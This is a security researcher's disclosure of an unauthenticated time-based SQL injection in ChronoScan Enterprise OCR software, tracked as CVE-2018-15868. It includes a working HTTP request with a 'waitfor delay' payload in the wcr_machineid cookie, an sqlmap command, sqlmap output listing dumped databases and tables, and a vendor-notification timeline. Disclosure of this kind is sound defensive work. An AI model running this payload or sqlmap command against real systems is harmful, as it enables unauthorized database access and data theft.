ChronoScan Enterprise Unauthenticated SQL Injection

Background

ChronoScan is an OCR software created by ChronoScan Capture S.L. used to read and parse of data from documents it receives. The software will take a document/pdf and based on how you have it setup, parse selected data from the input file. This is especially helpful in situations where there is an automated process sending a high number of documents that need to be put into a database or some other type of storage quickly. They have a community and enterprise versions.

Vulnerability

I've identified an unauthenticated time-based SQL injection on the latest ChronoScan enterprise version (v1.5.4.3 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions but, due to the nature of the attack (unauthenticated, no specific parameters, etc), I believe it's present on all versions up to this point. I will update this post when the vendor has confirmed to which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used with identifying users and the sessions associated with them. In this case, it seems as though the wcr_machineid cookie is inserted unsanitized into a SQL statement to check the current “machines” access level. An unauthenticated attacker can (even without a valid wcr_machineid cookie) exploit a time-based SQL injection. Below is the request that was originally used for identification.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

If you compare this request (a delay of 20 seconds) to one without the SQL statement, you will see it takes ~20 seconds for the response to come back. I took this and ran the following command in sqlmap which led to confirmation of a vulnerability.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"

After confirmation, I dumped the following databases.

[*] CHRONOSCAN
[*] master
[*] model
[*] msdb
[*] tempdb

Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache
(snip)

Timeline

-August 24, 2018: Vulnerability Identified -August 24, 2018: Vendor Notified & Acknowledged -August 24, 2018: CVE ID requested -August 24, 2018: CVE-2018-15868 reserved -August 27, 2018: Details provided to MITRE -August 28, 2018: Vendor issues patch for verification (not public yet)